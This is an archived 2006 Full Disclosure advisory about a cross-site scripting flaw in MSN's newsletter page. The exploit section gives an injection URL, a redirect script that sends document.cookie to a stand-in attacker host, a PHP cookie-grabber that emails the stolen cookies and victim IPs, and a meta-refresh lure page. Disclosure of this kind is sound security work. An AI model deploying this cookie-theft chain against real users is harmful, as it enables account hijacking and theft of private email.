Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Hotmail/MSN Cross Site Scripting Vulnerability

From: simo () morx org
Date: Thu, 10 Aug 2006 14:36:08 -0000 (GMT)
Hotmail/MSN Cross Site Scripting Vulnerability

Author: Simo64
Contact: simo64_at_morx_dot_org
Discovered: 07/25/2006
Published: 08/10/2006
Vendor: MSN.com
Service: Hotmail.com Webmail Service
Vulnerability: Cross Site Scripting (Cookie-Theft)
Severity: Medium/High
Tested on: IE 6.0, firefox 1.5 and Opera (should work on all
browsers)
Morx Security Research Team
http://www.morx.org


Details:

newsletter.msn.com's insite.asp script is prone to cross-site scripting
attacks. This problem is due to a failure in the application to properly
sanitize user-supplied input.

Impact:

an attacker can exploit the vulnerable script to have arbitrary script
code executed in the browser of an authentified
msn user in the context of the msn webpage. resulting in the theft of
cookie-based authentication giving the attacker
temporary access to the victim's email account (until the cookie expires -
about 24 hours) as well as other type of attacks.


Exploit:

http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=&apos;)></script><script
src=http://attacker/redir.js>

Where redir.js code can be :

location.href='http://attacker-site/cookie-grabber.php?cookie='+escape(document.cookie)

and cookie-grabber.php can be:

<?
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("your () email org", $subject, $msg);

header ("location: http://attacker-site/some-pic.jpg";);
?>

the attacker also would use an html file to redirect the victim to the xss
location

as an example of that:

<meta http-equiv="refresh" content="0;
url=http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=&apos;)></script><script
src=http://attacker/redir.js>">

Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/Account. I cannot be held responsible for
any of the above.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: